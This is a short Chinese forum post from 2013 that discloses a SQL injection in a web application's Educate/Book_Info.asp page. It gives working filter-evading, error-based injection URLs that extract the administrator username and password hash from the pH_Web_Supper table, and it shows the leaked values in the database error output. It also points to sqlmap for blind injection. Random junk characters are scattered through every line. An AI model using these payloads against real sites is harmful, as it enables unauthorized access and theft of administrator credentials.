漏洞出现在Educate/Book_Info.asp 4 t" a$ ~3 f8 w4 \+ l2 M
- X9 k3 B0 I) \9 n3 Y( _# m. r! R
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
( {' ]6 X" d! ~3 d. |
, d6 o6 y& ~$ q- fexp:如下
6 W7 I+ A& A3 z6 ^- e查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( m+ N" _1 G. j( o
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# X3 }6 u M3 S, p: `
% H# @: a7 T+ |( v, i, o
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" l P7 }9 S2 w . ~0 a5 u3 B7 H# Q/ {# ?
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
" ^1 v6 J5 A" S1 l& _. u* ? % J+ x; B1 ]- E, z
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
4 P- g0 G3 t# j
- z2 C0 s9 C( {: f; T$ z; ~/Educate/Book_Info.asp,行 8 a1 s) }; x' j8 W) T9 D6 U
2 v n5 v8 [) c' I v; `0 b' n
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& [* d( ~' R) H+ h7 W) z
% ?& ]% N- {2 A i- g! Y$ RMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'/ }* r* p& }4 ~. J# j
6 K$ h$ A4 c- u- k1 ]5 A
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% U, Z1 p/ N: h& Y9 N/ f" D
- g* z2 ~. v8 h' r3 m/Educate/Book_Info.asp,行 8+ {: h5 g' E @1 M1 x
|
发表于 2013-2-16 21:44:16
收藏
支持
反对